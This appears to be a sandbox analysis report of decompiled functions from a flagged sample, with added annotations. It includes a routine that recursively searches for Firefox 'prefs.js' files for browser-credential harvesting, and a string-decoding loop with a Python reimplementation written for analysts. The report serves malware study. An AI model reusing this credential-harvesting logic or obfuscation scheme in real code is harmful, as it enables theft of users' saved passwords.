  • Part of subcall function 004062B7: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062BF
  • Part of subcall function 004062B7: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062CE
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: strlen$memsetstrcatstrcpy
• String ID: sqlite3.dll
• API String ID: 1581230619-1155512374
• Opcode ID: 16108ddf4f13ffc1d1035336796fcbbad104ce4c6981e8ccb6bc320039be4e03
• Instruction ID: 4f80a8773c1d4988f6668b9143c1107d12609c3bb00905d80200812c675c4c4f
• Opcode Fuzzy Hash: 16108ddf4f13ffc1d1035336796fcbbad104ce4c6981e8ccb6bc320039be4e03
• Instruction Fuzzy Hash: F6F0427250C1186EDB20E769DC45FC977AC8F60318F1000B7F589E60C2DAF8D6C58668
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00409A67(intOrPtr* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void* __esi;
				void* _t15;
				intOrPtr* _t24;
				char* _t26;

				_t24 = __ecx;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				_t15 =  *((intOrPtr*)( *_t24 + 0x20))();
				_t26 =  &_v260;
				E0040918B(_t26, _t15);
				sprintf( &_v516, "</%s>\r\n", _t26);
				return E00405F07(_a4,  &_v516);
			}

Instruction addresses: 0x00409a81, 0x00409a83, 0x00409a8a, 0x00409a99, 0x00409aa0, 0x00409aac, 0x00409ab0, 0x00409ab6, 0x00409aca, 0x00409ae4

APIs
• memset.MSVCRT ref: 00409A8A
• memset.MSVCRT ref: 00409AA0
  • Part of subcall function 0040918B: strcpy.MSVCRT(00000000,?,00409874,?,?,?), ref: 00409190
  • Part of subcall function 0040918B: _strlwr.MSVCRT ref: 004091D3
• sprintf.MSVCRT ref: 00409ACA
  • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
  • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,76D24DE0,00000000,?,?,00409460,00000001,00413B1C,76D24DE0), ref: 00405F21
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
• String ID: </%s>
• API String ID: 3202206310-259020660
• Opcode ID: 637a9c7a3fbe891b17e74324215966cd4ae9ffaeb73701361f90968b62e1fe90
• Instruction ID: 3d0bab8d804eeed29aac85efced1b4409724b73b0f4afa6070eee5aab36d753a
• Opcode Fuzzy Hash: 637a9c7a3fbe891b17e74324215966cd4ae9ffaeb73701361f90968b62e1fe90
• Instruction Fuzzy Hash: A801F9729001296BD720A259CC45FDB7B6C9F54304F0400FAB60DF3142D6B49A94CBA5
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 89%
E004021E0(void* __ecx, intOrPtr _a4, char* _a8) {
	void* __ebx;
	intOrPtr _t22;
	void* _t23;
	void* _t25;
	void* _t27;
	void* _t29;
	void* _t32;
	void* _t36;
	signed short _t42;
	char* _t47;
	void* _t48;
	intOrPtr _t49;
	intOrPtr _t50;
	void* _t57;

	_t22 = _a4;
	_t57 = _t22 - 6;
	_t47 = _a8;
	_t48 = __ecx;
	 *_t47 = 0;
	if(_t57 > 0) {
		_t23 = _t22 - 7;
		if(_t23 == 0) {
			return __ecx + 0x214;
		}
		_t25 = _t23 - 1;
		if(_t25 == 0) {
			return __ecx + 0x294;
		}
		_t27 = _t25 - 1;
		if(_t27 == 0) {
			return __ecx + 0x314;
		}
		_t29 = _t27 - 1;
		if(_t29 == 0) {
			_t49 =  *((intOrPtr*)(__ecx + 0x3a0));
			if(_t49 < 1 || _t49 > 7) {
				if(_t49 < 8 || _t49 > 0xe) {
					if(_t49 < 0xf || _t49 > 0x19) {
						if(_t49 < 0x1a || _t49 > 0x2d) {
							if(_t49 < 0x2e) {
								L16:
								return _t47;
							}
							_t42 = 0x519;
						} else {
							_t42 = 0x518;
						}
					} else {
						_t42 = 0x517;
					}
				} else {
					_t42 = 0x516;
				}
				goto L20;
			} else {
				_t42 = 0x515;
				L20:
				return E00407A69(_t42);
			}
		}
		_t32 = _t29 - 1;
		if(_t32 == 0) {
			return __ecx + 0x190;
		}
		if(_t32 != 1) {
			goto L16;
		}
		_t50 =  *((intOrPtr*)(__ecx + 0x39c));
		L14:
		if(_t50 != 0) {
			_push(0xa);
			_push(_t47);
			_push(_t50);
			L0041203C();
		}
		goto L16;
	}
	if(_t57 == 0) {
		_t42 =  *((intOrPtr*)(__ecx + 0x210)) + 0x320;
		goto L20;
	}
	if(_t22 == 0xfffffff6) {
		_t36 = E00407A69( *((intOrPtr*)(__ecx + 0x8c)) + 0x384);
		sprintf(_t47, "%s  %s  %s", E00407A69( *((intOrPtr*)(_t48 + 0x210)) + 0x320), _t48 + 0x110, _t36);
		goto L16;
	}
	if(_t22 == 0) {
		return __ecx + 0xc;
	}
	if(_t22 == 1) {
		_t42 =  *((intOrPtr*)(__ecx + 0x8c)) + 0x384;
		goto L20;
	}
	if(_t22 == 2) {
		return __ecx + 0x90;
	}
	if(_t22 == 3) {
		return __ecx + 0x110;
	}
	if(_t22 == 4) {
		_t50 =  *((intOrPtr*)(__ecx + 0x394));
		goto L14;
	}
	if(_t22 != 5) {
		goto L16;
	}
	if( *((intOrPtr*)(__ecx + 0x398)) == 0) {
		_push(0x10);
	} else {
		_push(0xf);
	}
	_pop(_t42);
	goto L20;
}

                                                                                                                                                                  0x0040223d
                                                                                                                                                                  0x0040223f
                                                                                                                                                                  0x00402241
                                                                                                                                                                  0x00402243
                                                                                                                                                                  0x00402244
                                                                                                                                                                  0x00402245
                                                                                                                                                                  0x0040224a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040223f
                                                                                                                                                                  0x004021f9
                                                                                                                                                                  0x004022c9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004022c9
                                                                                                                                                                  0x00402202
                                                                                                                                                                  0x00402294
                                                                                                                                                                  0x004022b9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004022be
                                                                                                                                                                  0x0040220a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402280
                                                                                                                                                                  0x0040220f
                                                                                                                                                                  0x00402270
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402270
                                                                                                                                                                  0x00402214
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040225f
                                                                                                                                                                  0x00402219
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402254
                                                                                                                                                                  0x0040221e
                                                                                                                                                                  0x00402237
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402237
                                                                                                                                                                  0x00402223
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040222c
                                                                                                                                                                  0x00402233
                                                                                                                                                                  0x0040222e
                                                                                                                                                                  0x0040222e
                                                                                                                                                                  0x0040222e
                                                                                                                                                                  0x00402230
                                                                                                                                                                  0x00000000

Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Similarity
• API ID: _ultoasprintf
• String ID: %s %s %s
• API String ID: 432394123-3850900253
• Opcode ID: ad10a0a60f11ae5ad813c548426d3cbfbdd2c873bbe0414cf6ac4599a9575019
• Instruction ID: 4550bc8a79151648f87db51bd02682248f93ba3dc48fc4e36bbc9480066499b4
• Opcode Fuzzy Hash: ad10a0a60f11ae5ad813c548426d3cbfbdd2c873bbe0414cf6ac4599a9575019
• Instruction Fuzzy Hash: F741F731904B16C7CA34956487CCBEBA298E702304F6504BFDC5AF72D0D2FCAE46866B
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040851B(intOrPtr* __esi, struct HWND__* _a4) {
	long _v12;
	int _v16;
	int _v20;
	int _v28;
	signed int _v32;
	int _v36;
	void* _v40;
	long _t16;
	intOrPtr _t22;
	void* _t24;
	signed int _t25;
	void* _t26;
	int _t27;
	intOrPtr* _t28;

	/* __esi points at a {entries, count} pair: *__esi is an array of
	   4-byte records (16-bit width, 16-bit order), (__esi + 4) is the count.
	   _a4 is the window handle of a list-view control. */
	_t28 = __esi;
	if(_a4 == 0) {
		L12:
		return _t16;
	}
	_t22 =  *((intOrPtr*)(__esi + 4));
	_t26 = 0;
	_t24 = 0;
	if(_t22 <= 0) {
		L6:
		_t27 = 0;
		if(_t22 <= 0) {
			goto L12;
		} else {
			goto L7;
		}
		do {
			L7:
			_t16 =  *_t28 + _t27 * 4;
			_t25 =  *_t16 & 0x0000ffff;
			if(_t25 >= 0 && _t25 < 0x7d0) {
				_t16 =  *((short*)(_t16 + 2));
				if(_t16 < _t22) {
					/* Build an LVCOLUMN on the stack: mask 0x22 is
					   LVCF_WIDTH | LVCF_ORDER, cx = stored width,
					   iOrder = stored position. */
					_v12 = _t16;
					_v40 = 0x22;
					_v32 = _t25;
					_v36 = 0;
					_v28 = 0;
					_v20 = 0;
					_v16 = 0;
					/* 0x101a is LVM_SETCOLUMNA: restore column _t27 */
					_t16 = SendMessageA(_a4, 0x101a, _t27,  &_v40);
				}
			}
			_t22 =  *((intOrPtr*)(_t28 + 4));
			_t27 = _t27 + 1;
		} while (_t27 < _t22);
		goto L12;
	}
	/* Pre-pass: bail out if two or more records carry an order of 0 */
	_t16 =  *__esi + 2;
	do {
		if( *_t16 != 0) {
			goto L5;
		}
		_t26 = _t26 + 1;
		if(_t26 >= 2) {
			goto L12;
		}
		L5:
		_t24 = _t24 + 1;
		_t16 = _t16 + 4;
	} while (_t24 < _t22);
	goto L6;
}
                                                                                                                                                                  0x00408544
                                                                                                                                                                  0x00408545
                                                                                                                                                                  0x00408548
                                                                                                                                                                  0x00000000

APIs
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: MessageSend
• String ID: "$\LA
• API String ID: 3850602802-1791104459
• Opcode ID: 6730269ec323a4575099126faff27654677e2dead0fd5bf6d10708e601ad3506
• Instruction ID: ec77e5a748e9a6ff816ea2aa2a284b6bdb41b89871e7a2a93e67b2087f5a6bee
• Opcode Fuzzy Hash: 6730269ec323a4575099126faff27654677e2dead0fd5bf6d10708e601ad3506
• Instruction Fuzzy Hash: 52115171A00115AEDB149F9ACEC04BEB7F5FB98305B50843FD1D6E7680DB789982CB58
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 90%
			/* Recursive directory walk: enumerates "*.*" under the directory in _a4 (_a8 is the
			   current depth) and, below the top level, looks for the Firefox profile file "prefs.js".
			   Each match is passed to E0040D7C1, i.e. the browser-credential harvesting path flagged
			   by the WebBrowserPassView detection in this report. */
			E0040D9D8(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v328;
				char _v652;
				char _v928;
				char _v1296;
				signed int _v1300;
				void* __esi;
				char* _t26;
				void* _t42;
				intOrPtr* _t44;

				_t42 = __edx;
				_v1300 = _v1300 | 0xffffffff;
				_v1296 = 0;
				_v328 = 0;
				_v652 = 0;
				_t44 = __ecx;
				/* E00406FD2/E0040702D/E004070C5: find-first / find-next / find-close style enumeration
				   over "*.*" in _a4 (the API ID for this function lists FileFindFirst). */
				E00406FD2( &_v1300, __eflags, "*.*", _a4);
				while(E0040702D( &_v1300) != 0) {
					/* E00406F97 != 0 means the current entry is a subdirectory. */
					__eflags = E00406F97( &_v1300);
					if(__eflags == 0) {
						__eflags = _a8 - 1;
						if(_a8 > 1) {
							/* L00412072 is a string comparison of the entry name against "prefs.js";
							   a zero result means the names match. */
							_t26 =  &_v928;
							_push("prefs.js");
							_push(_t26);
							L00412072();
							__eflags = _t26;
							if(_t26 == 0) {
								/* _v652 holds the full path of the match; process it if it can be opened. */
								__eflags = E00406155( &_v652);
								if(__eflags != 0) {
									E0040D7C1(_t44, _t42, __eflags,  &_v652);
								}
							}
						}
					} else {
						/* Subdirectory: recurse one level deeper. */
						_a8 = _a8 + 1;
						E0040D9D8(_t44, _t42, __eflags,  &_v652, _a8);
					}
				}
				E004070C5( &_v1300);
				return 1;
			}

Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: strlen$FileFindFirst
• String ID: *.*$prefs.js
• API String ID: 2516927864-1592826420
• Opcode ID: 6a000196e6438ec39e637ca0eb5d4ae5762e5a1622c1bb359a3e97ee416ced3e
• Instruction ID: 0a1894bf97bc7f37e7ea977f35cd1e9cdc16bb9bd7797736beedadfbd1967f85
• Opcode Fuzzy Hash: 6a000196e6438ec39e637ca0eb5d4ae5762e5a1622c1bb359a3e97ee416ced3e
• Instruction Fuzzy Hash: 1811947250C3465ED720EAA58C01ADB7BD89F55314F14863FF898E21C2D738D61DCB9A
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
			/* Thin wrapper around GetSaveFileNameA. _v80.._v20 are the fields of an OPENFILENAMEA
			   (struct tagOFNA) built on the stack: __ecx is the owner window, _a4 the filter string,
			   __edi the caller's path buffer, _a8 the dialog title, _a12 the default extension and
			   *__ebx the filter index (read before, written back after the dialog). */
			E004066AF(intOrPtr* __ebx, intOrPtr __ecx, char* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;
				intOrPtr _t23;
				intOrPtr* _t33;
				intOrPtr _t34;
				char* _t38;

				_t38 = __edi;
				_t34 = __ecx;
				_t33 = __ebx;
				_t23 = 1;
				if(__ebx != 0) {
					_t23 =  *__ebx;
				}
				_v64 = _v64 & 0x00000000;	/* lpstrCustomFilter = NULL */
				_v44 = _v44 & 0x00000000;	/* lpstrFileTitle = NULL */
				_v36 = _v36 & 0x00000000;	/* lpstrInitialDir = NULL */
				_v56 = _t23;			/* nFilterIndex */
				_v32 = _a8;			/* lpstrTitle */
				_v20 = _a12;			/* lpstrDefExt */
				_v76 = _t34;			/* hwndOwner */
				_v80 = 0x4c;			/* lStructSize = sizeof(OPENFILENAMEA) */
				_v68 = _a4;			/* lpstrFilter */
				_v52 = _t38;			/* lpstrFile = caller's buffer */
				_v48 = 0x104;			/* nMaxFile = MAX_PATH (260) */
				/* Flags = OFN_EXPLORER | OFN_PATHMUSTEXIST | OFN_HIDEREADONLY | OFN_OVERWRITEPROMPT */
				_v28 = 0x80806;
				if(GetSaveFileNameA( &_v80) == 0) {
					return 0;	/* dialog cancelled or failed */
				} else {
					if(_t33 != 0) {
						 *_t33 = _v56;	/* hand the chosen filter index back to the caller */
					}
					/* _v52 was set to _t38 above, so this copies the selected path onto itself. */
					strcpy(_t38, _v52);
					return 1;
				}
			}

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileNameSavestrcpy
                                                                                                                                                                  • String ID: L
                                                                                                                                                                  • API String ID: 1182090483-2909332022
                                                                                                                                                                  • Opcode ID: 2aa07690fce79c473fa63c108ae99b2fccd51bdc1973966a0ba636b15db491df
                                                                                                                                                                  • Instruction ID: d41a0f3581961b0f058ab7b38d8a0fc10f69f88ca1386dcb34cd33e007bc3755
                                                                                                                                                                  • Opcode Fuzzy Hash: 2aa07690fce79c473fa63c108ae99b2fccd51bdc1973966a0ba636b15db491df
                                                                                                                                                                  • Instruction Fuzzy Hash: D301E9B1D102099FDF10DFA9D8847AEBBF4BF08319F10442AE915E6340DB749955CF54
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadMenuA.USER32 ref: 00407D2B
                                                                                                                                                                  • sprintf.MSVCRT ref: 00407D4E
                                                                                                                                                                    • Part of subcall function 00407BCE: GetMenuItemCount.USER32 ref: 00407BE4
                                                                                                                                                                    • Part of subcall function 00407BCE: memset.MSVCRT ref: 00407C08
                                                                                                                                                                    • Part of subcall function 00407BCE: GetMenuItemInfoA.USER32 ref: 00407C3E
                                                                                                                                                                    • Part of subcall function 00407BCE: memset.MSVCRT ref: 00407C6B
                                                                                                                                                                    • Part of subcall function 00407BCE: strchr.MSVCRT ref: 00407C77
                                                                                                                                                                    • Part of subcall function 00407BCE: strcat.MSVCRT(?,?,?,?,?,00000001,?), ref: 00407CD2
                                                                                                                                                                    • Part of subcall function 00407BCE: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 00407CEE
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Menu$Itemmemset$CountInfoLoadModifysprintfstrcatstrchr
                                                                                                                                                                  • String ID: menu_%d
                                                                                                                                                                  • API String ID: 3671758413-2417748251
                                                                                                                                                                  • Opcode ID: 49ac11d1195a608e742f3e6ca3ff2f5e26bbcd1b47ce44f2e641ce1c3c472826
                                                                                                                                                                  • Instruction ID: 2770b7a066d609e077f5412e4a2b93c9a9718e974603bd13de201155b170d4e3
                                                                                                                                                                  • Opcode Fuzzy Hash: 49ac11d1195a608e742f3e6ca3ff2f5e26bbcd1b47ce44f2e641ce1c3c472826
                                                                                                                                                                  • Instruction Fuzzy Hash: 25D0C271A4911036CB2133366C0AFDB3C288BD2719F28406EF000650C1CABCA182827E
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E004084B2(char* __esi) {
                                                                                                                                                                  				char* _t2;
                                                                                                                                                                  				char* _t6;
                                                                                                                                                                  
                                                                                                                                                                  				_t6 = __esi;
                                                                                                                                                                  				E0040616A(__esi);
                                                                                                                                                                  				_t2 = strrchr(__esi, 0x2e);
                                                                                                                                                                  				if(_t2 != 0) {
                                                                                                                                                                  					 *_t2 = 0;
                                                                                                                                                                  				}
                                                                                                                                                                  				return strcat(_t6, "_lng.ini");
                                                                                                                                                                  			}


                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040616A: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,004084B8,00000000,004083D6,?,00000000,00000104,?), ref: 00406175
                                                                                                                                                                  • strrchr.MSVCRT ref: 004084BB
                                                                                                                                                                  • strcat.MSVCRT(00000000,_lng.ini,00000000,00000104,?), ref: 004084D0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileModuleNamestrcatstrrchr
                                                                                                                                                                  • String ID: _lng.ini
                                                                                                                                                                  • API String ID: 3097366151-1948609170
                                                                                                                                                                  • Opcode ID: 2d253c9011988194c7ab29affedf6fb1a5ea8153034ac82cdf8f1fb697810a88
                                                                                                                                                                  • Instruction ID: 42c27a01d44ad3a484ea9941e8a753782f6a4a1a49f0a0828630b4f1254f47e7
                                                                                                                                                                  • Opcode Fuzzy Hash: 2d253c9011988194c7ab29affedf6fb1a5ea8153034ac82cdf8f1fb697810a88
                                                                                                                                                                  • Instruction Fuzzy Hash: 98C0126924565024D12621215E03B8A09494F26319F24416BF501781C3EE9C46E1806E
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                                  			E00407570(char* __eax, intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				int _v12;
                                                                                                                                                                  				char* _v16;
                                                                                                                                                                  				char _v20;
                                                                                                                                                                  				signed int* _v24;
                                                                                                                                                                  				char _v28;
                                                                                                                                                                  				void _v284;
                                                                                                                                                                  				char _v540;
                                                                                                                                                                  				char _v1068;
                                                                                                                                                                  				void _v3115;
                                                                                                                                                                  				char _v3116;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				signed int _t35;
                                                                                                                                                                  				signed int _t36;
                                                                                                                                                                  				signed int _t40;
                                                                                                                                                                  				signed int* _t61;
                                                                                                                                                                  				char _t69;
                                                                                                                                                                  				char* _t74;
                                                                                                                                                                  				char* _t75;
                                                                                                                                                                  				intOrPtr* _t76;
                                                                                                                                                                  				signed int _t78;
                                                                                                                                                                  				int _t80;
                                                                                                                                                                  				void* _t83;
                                                                                                                                                                  				void* _t84;
                                                                                                                                                                  				signed int _t89;
                                                                                                                                                                  
                                                                                                                                                                  				_t74 = __eax;
                                                                                                                                                                  				_t35 = strlen(__eax);
                                                                                                                                                                  				_t78 = _t35;
                                                                                                                                                                  				_t36 = _t35 & 0x80000001;
                                                                                                                                                                  				if(_t36 < 0) {
                                                                                                                                                                  					_t36 = (_t36 - 0x00000001 | 0xfffffffe) + 1;
                                                                                                                                                                  					_t89 = _t36;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_t89 != 0 || _t78 <= 0x20) {
                                                                                                                                                                  					return _t36;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_v3116 = 0;
                                                                                                                                                                  					memset( &_v3115, 0, 0x7ff);
                                                                                                                                                                  					_v8 = _v8 & 0x00000000;
                                                                                                                                                                  					_t61 = _a4 + 4;
                                                                                                                                                                  					_t40 =  *_t61 | 0x00000001;
                                                                                                                                                                  					if(_t78 <= 4) {
                                                                                                                                                                  						L7:
                                                                                                                                                                  						_t79 =  &_v1068;
                                                                                                                                                                  						E004046E1( &_v1068);
                                                                                                                                                                  						if(E004047AA( &_v1068, _t93) != 0) {
							_v20 = _v8;                                  // pointer to the input blob
							_v16 =  &_v3116;                              // decoded string buffer, filled by the loop below
							_v28 = 0x10;
							_v24 = _t61;
							if(E0040481B(_t79,  &_v20,  &_v28,  &_v12) != 0) {   // _v12 receives the result length
								_t80 = _v12;
								if(_t80 > 0xff) {                         // clamp the copy length to 0xff bytes
									_t80 = 0xff;
								}
								_v540 = 0;
								_v284 = 0;
								memcpy( &_v284, _v8, _t80);               // copy the result into a local buffer and NUL-terminate it
								_t75 =  &_v540;
								 *((char*)(_t84 + _t80 - 0x118)) = 0;
								E004060DA(0xff, _t75, _a8);
								 *((intOrPtr*)( *_a4))(_t75);             // hand the result to the callback passed in _a4
								LocalFree(_v8);                           // the pointer given to E0040481B is released with LocalFree
							}
						}
						return E004047FB( &_v1068);
					}
					// String-decoding loop: two input bytes give one output byte.
					// High nibble = (c0 - 1) << 4, low nibble = c1 - 0x21; the running
					// 32-bit key _t40 is subtracted, then multiplied by 0x10ff5 for the
					// next byte. Only the low byte is stored, at ebp - 0xc28 + index,
					// i.e. into the buffer that is later passed as _v16.
					_t76 = _t74 + 5;                                  // pair pointer: first pair is bytes 4 and 5 of the input
					_t83 = (_t78 + 0xfffffffb >> 1) + 1;              // iteration count: ((len - 5) >> 1) + 1
					do {
						_t69 = ( *((intOrPtr*)(_t76 - 1)) - 0x00000001 << 0x00000004 |  *_t76 - 0x00000021) - _t40;
						_t40 = _t40 * 0x10ff5;                        // key schedule, wraps mod 2^32
						_t76 = _t76 + 2;
						_v8 = _v8 + 1;
						_t83 = _t83 - 1;
						_t93 = _t83;                                  // dead copy kept by the decompiler (sets flags only)
						 *((char*)(_t84 + _v8 - 0xc28)) = _t69;       // store the low byte of the decoded value
					} while (_t83 != 0);
					goto L7;                                          // back to the E0040481B call above with the decoded buffer
				}
			}
(address column of the listing above: 0x0040757c to 0x004076b4)

Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
• API ID: FreeLocalmemcpymemsetstrlen
• String ID:
• API String ID: 3110682361-0
• Opcode ID: 4a01b5491f9ecde230b25e47fc41df6e3a48aedd09d870957f2f4d0e5019b56d
• Instruction ID: a7b320da169f7f969887caa54c031871a44602910a4795043d90d4c59a740d9e
• Opcode Fuzzy Hash: 4a01b5491f9ecde230b25e47fc41df6e3a48aedd09d870957f2f4d0e5019b56d
• Instruction Fuzzy Hash: B0312972D0011D9BDB10DB68CC81BDEBBB8EF45318F1006B6E545B3281DA79AE858B95
• Uniqueness Score: -1.00%
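The decoding loop in the function above (two input bytes per output byte, running key subtracted and multiplied by 0x10ff5) is small enough to reimplement for string recovery during analysis. The following is an added example, not code from the sample or from this report. The loop starts at offset 4 of the input; what the first four bytes contain and the initial key value are not shown on this page, so both are taken here as parameters. The encoder exists only to build constructed test input and is not something the sample contains.

```python
# Added example: reimplementation of the nibble-pair string decoder seen in the
# decompiled loop above. The key seed and the meaning of the 4-byte prefix are
# assumptions (not recoverable from the listing); they are parameters here.

MULT = 0x10FF5        # key multiplier from the loop: _t40 = _t40 * 0x10ff5
MASK32 = 0xFFFFFFFF   # _t40 is a 32-bit register, so the product wraps mod 2**32


def decode_pairs(encoded: bytes, key: int) -> bytes:
    """Decode pairs (c0, c1): value = (((c0 - 1) << 4) | (c1 - 0x21)) - key.

    Only the low byte of the value is stored, exactly as the loop writes a
    single char; the key is advanced after every output byte. A trailing
    odd byte has no partner and is ignored.
    """
    out = bytearray()
    key &= MASK32
    for i in range(0, len(encoded) - 1, 2):
        c0, c1 = encoded[i], encoded[i + 1]
        val = (((c0 - 1) << 4) | (c1 - 0x21)) - key
        out.append(val & 0xFF)
        key = (key * MULT) & MASK32
    return bytes(out)


def decode_blob(blob: bytes, key: int) -> bytes:
    """Apply the same bounds the loop uses: start at offset 4, run
    ((len - 5) >> 1) + 1 iterations. Blobs shorter than 6 bytes would make
    the original loop read past its input, so they are rejected here."""
    if len(blob) < 6:
        raise ValueError("blob too short for the decoder's loop bounds")
    count = ((len(blob) - 5) >> 1) + 1
    return decode_pairs(blob[4:4 + 2 * count], key)


def encode_pairs(plain: bytes, key: int) -> bytes:
    """Inverse of decode_pairs, used only to construct sample input.

    Any c0 whose low nibble after subtracting 1 equals the high nibble of
    the keyed byte would decode identically; the smallest such c0 is used.
    """
    out = bytearray()
    key &= MASK32
    for b in plain:
        v = (b + key) & 0xFF
        out.append((v >> 4) + 1)         # high nibble carrier
        out.append((v & 0x0F) + 0x21)    # low nibble carrier
        key = (key * MULT) & MASK32
    return bytes(out)


if __name__ == "__main__":
    # Constructed sample: unknown 4-byte prefix (assumed opaque here) plus
    # the encoded payload for "hello" under an assumed seed of 0x1234.
    seed = 0x1234
    blob = b"\x00\x00\x00\x00" + encode_pairs(b"hello", seed)
    print(decode_blob(blob, seed))
```

When applying this to a real dump, the seed has to be recovered from the code that initialises _t40 before the loop, which is outside the fragment shown here; with the wrong seed the output is a byte-wise offset of the true string rather than garbage, which is a quick sanity check for whether the scheme itself matches.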

                                                                                                                                                                  C-Code - Quality: 88%
			// Constructor-style routine: __esi is the object. It installs the vtable
			// pointer 0x414350, runs E00406578 on the 0x1c8-byte object, then allocates
			// four 0x14-byte records and stores them at this+4, +8, +0xc and +0x10.
			// L00412090 is called with 0x14 pushed (the size) and its eax result is what
			// the decompiler shows as _t22; each record is zeroed except field +0x10 = 0x100.
			E00408638(intOrPtr* __esi, void* __eflags) {
				intOrPtr* _t22;
				intOrPtr* _t31;

				_t31 = __esi;
				 *__esi = 0x414350;                               // vtable pointer
				_t22 = E00406578(0x1c8, __esi);                  // base initialisation of the object
				_push(0x14);
				L00412090();                                     // allocate record 1 (size 0x14)
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;          // only non-zero field
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t31 + 4)) = _t22;                 // this+4 = record 1 (or NULL on allocation failure)
				L00412090();                                     // allocate record 2
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
